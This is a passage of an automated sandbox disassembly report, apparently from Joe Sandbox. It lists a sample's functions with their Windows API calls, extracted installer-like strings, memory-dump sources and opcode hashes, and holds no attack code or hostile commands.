                                                                                                      • BeginPaint.USER32(00000000,?), ref: 00416C62
                                                                                                      • SaveDC.GDI32(?), ref: 00416C93
                                                                                                      • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
                                                                                                      • RestoreDC.GDI32(?,?), ref: 00416D1B
                                                                                                      • EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                      • String ID:
                                                                                                      • API String ID: 3808407030-0
                                                                                                      • Opcode ID: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                                      • Instruction ID: c70ebf24aed337d2f43398dc79d2f74fb7d9fd2825851e0a0ce007a429ecfdc3
                                                                                                      • Opcode Fuzzy Hash: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                                      • Instruction Fuzzy Hash: D7413C70A04204AFDB04DB99D985FAE77F9EB48304F1640AEE4059B362D778ED85CB58
                                                                                                      Function 00414810 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                                      • Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
                                                                                                      • Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                                      • Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19
                                                                                                      Function 004297DC Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
                                                                                                      • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
                                                                                                      • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
                                                                                                      • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
                                                                                                      • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: 52b5b48316c5d4ae37ce8577e0a97d76e0e4998a9a2ed84e03e9d155575d1481
                                                                                                      • Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
                                                                                                      • Opcode Fuzzy Hash: 52b5b48316c5d4ae37ce8577e0a97d76e0e4998a9a2ed84e03e9d155575d1481
                                                                                                      • Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C
                                                                                                      Function 0041BBC8 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
                                                                                                      • GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
                                                                                                      • 73A0A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
                                                                                                      • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
                                                                                                      • DeleteObject.GDI32(00000000), ref: 0041BCAA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MetricsSystem$A16310A570DeleteObject
                                                                                                      • String ID:
                                                                                                      • API String ID: 2246927583-0
                                                                                                      • Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                                      • Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
                                                                                                      • Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                                      • Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98
                                                                                                      Function 00473848 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 71COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0045D3B0: SetLastError.KERNEL32(00000057,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D41B
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,0047391C,?,?,0049C1D0,00000000), ref: 004738D5
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,0047391C,?,?,0049C1D0,00000000), ref: 004738EB
                                                                                                      Strings
                                                                                                      • Setting permissions on registry key: %s\%s, xrefs: 0047389A
                                                                                                      • Failed to set permissions on registry key (%d)., xrefs: 004738FC
                                                                                                      • Could not set permissions on the registry key because it currently does not exist., xrefs: 004738DF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                                      • API String ID: 1452528299-4018462623
                                                                                                      • Opcode ID: 65c899866a6f92bdc558b75d1f6f5c8f40dffa86cd9e0ff42c768141b597e19f
                                                                                                      • Instruction ID: 0e56c8fb080e82cb73bff42131c1910bc7e2d1be1188aa0d4929b19add272574
                                                                                                      • Opcode Fuzzy Hash: 65c899866a6f92bdc558b75d1f6f5c8f40dffa86cd9e0ff42c768141b597e19f
                                                                                                      • Instruction Fuzzy Hash: D42186B0A046485FCB00DFA9C8816EEBBE5DF49315F50817BE508E7392D7B85A05CB6A
                                                                                                      Function 00403CA4 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                      • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$AllocString
                                                                                                      • String ID:
                                                                                                      • API String ID: 262959230-0
                                                                                                      • Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                                      • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                                      • Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                                      • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                                      Function 004143F0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • 73A08830.GDI32(00000000,00000000,00000000), ref: 00414429
                                                                                                      • 73A022A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
                                                                                                      • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
                                                                                                      • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
                                                                                                      • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: A022A08830$A480
                                                                                                      • String ID:
                                                                                                      • API String ID: 3036329673-0
                                                                                                      • Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                                                      • Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
                                                                                                      • Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                                                      • Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765
                                                                                                      Function 00406FAC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156shareCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
                                                                                                      • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
                                                                                                      • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Enum$NameOpenResourceUniversal
                                                                                                      • String ID: Z
                                                                                                      • API String ID: 3604996873-1505515367
                                                                                                      • Opcode ID: eb416ea4a1b8f2daa77fdd812f136362b1db0fd9b9a9c64830d5574e342882dc
                                                                                                      • Instruction ID: 2ace50d644c075eff23e32fa5e1ddfe03b8fa53596be5d4ceb5675c655e146ae
                                                                                                      • Opcode Fuzzy Hash: eb416ea4a1b8f2daa77fdd812f136362b1db0fd9b9a9c64830d5574e342882dc
                                                                                                      • Instruction Fuzzy Hash: C0513070E04218ABDB15DF55CD41A9EBBB9FB49304F1041BAE910BB3D1C778AE418F5A
                                                                                                      Function 0044CFD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetRectEmpty.USER32(?), ref: 0044D05E
                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D089
                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D111
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DrawText$EmptyRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 182455014-2867612384
                                                                                                      • Opcode ID: 9bd908fd6ab002ebc51c141ad104fc93549b6590cb61d9638f2d60c2e4f6398c
                                                                                                      • Instruction ID: 2c2bbb7fbf4b59eae95d31c7b28000ca71a9f0321ec4255fb332cd8a4a3f7a8e
                                                                                                      • Opcode Fuzzy Hash: 9bd908fd6ab002ebc51c141ad104fc93549b6590cb61d9638f2d60c2e4f6398c
                                                                                                      • Instruction Fuzzy Hash: F6516071E00244AFDB10DFA5C885BDEBBF8AF49308F08847AE845EB255D778A945CB64
                                                                                                      Function 0042EF84 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • 73A0A570.USER32(00000000,00000000,0042F0D8,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EFAE
                                                                                                        • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0042EFD1
                                                                                                      • 73A0A480.USER32(00000000,?,0042F0BD,00000000,0042F0B6,?,00000000,00000000,0042F0D8,?,?,?,?,00000000,00000000,00000000), ref: 0042F0B0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: A480A570CreateFontIndirectObjectSelect
                                                                                                      • String ID: ...\
                                                                                                      • API String ID: 2998766281-983595016
                                                                                                      • Opcode ID: da53642769cbe036028c7dc5c32fe254f1027efce08608ae13d670d4fc685408
                                                                                                      • Instruction ID: 4ea51e63949933808241df29427b07dd96e06abf1a704ffa26f869fa6ec4a11f
                                                                                                      • Opcode Fuzzy Hash: da53642769cbe036028c7dc5c32fe254f1027efce08608ae13d670d4fc685408
                                                                                                      • Instruction Fuzzy Hash: 2F315270B00128ABDF11EF96D841BAEB7B8EB48708FD1447BF410A7292D7785D49CA59
                                                                                                      Function 004538A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 00453997
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 004539A7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateFileHandle
                                                                                                      • String ID: .tmp$_iu
                                                                                                      • API String ID: 3498533004-10593223
                                                                                                      • Opcode ID: dc109c8f01286b2989461901934a6d9e01325b966eab87418c3e389b569fc91a
                                                                                                      • Instruction ID: 4fa05f029f2566c48aedd37e5d2d112a05e3774389c58111587f2dbaaee79b9c
                                                                                                      • Opcode Fuzzy Hash: dc109c8f01286b2989461901934a6d9e01325b966eab87418c3e389b569fc91a
                                                                                                      • Instruction Fuzzy Hash: 9531A6B0A40149ABCF01EF95C982B9EBBB5AF44345F50452AF800B72C2D6785F058AAD
                                                                                                      Function 00416420 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                                      • UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                                      • RegisterClassA.USER32(?), ref: 004164DE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Class$InfoRegisterUnregister
                                                                                                      • String ID: @
                                                                                                      • API String ID: 3749476976-2766056989
                                                                                                      • Opcode ID: 8cb808bfaf21f9b6be1f4599df9655a946cb93d0bbb2725194c7e4a3bd3b9422
                                                                                                      • Instruction ID: 7ea39428e622c43f80c69b44bdb33f9ce6dea52ad5211df5dc1c1138561595a4
                                                                                                      • Opcode Fuzzy Hash: 8cb808bfaf21f9b6be1f4599df9655a946cb93d0bbb2725194c7e4a3bd3b9422
                                                                                                      • Instruction Fuzzy Hash: 0E318E706042009BD760EF68C981B9B77E5AB88308F04457FF985DB392DB39D9848B6A
                                                                                                      Function 00497BE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C50
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C79
                                                                                                      • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00497C92
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Attributes$Move
                                                                                                      • String ID: isRS-%.3u.tmp
                                                                                                      • API String ID: 3839737484-3657609586
                                                                                                      • Opcode ID: 9f18e9119b438212db1bb595c56ccc89a7930ded87602de0aca2db56358788ed
                                                                                                      • Instruction ID: 213244b736f3eff521ec2db090c728ece63042f248bf50699bdf4cb02408e53f
                                                                                                      • Opcode Fuzzy Hash: 9f18e9119b438212db1bb595c56ccc89a7930ded87602de0aca2db56358788ed
                                                                                                      • Instruction Fuzzy Hash: 53214171E14219AFCF05EFA9C881AAFBBB8AB44714F50453BB814B72D1D6385E018B69
                                                                                                      Function 00404D2A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                                      • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitMessageProcess
                                                                                                      • String ID: Error$Runtime error at 00000000
                                                                                                      • API String ID: 1220098344-2970929446
                                                                                                      • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                      • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                                      • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                      • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                                      Function 00456A34 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                                                        • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                        • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                      • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A88
                                                                                                      • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456AB5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
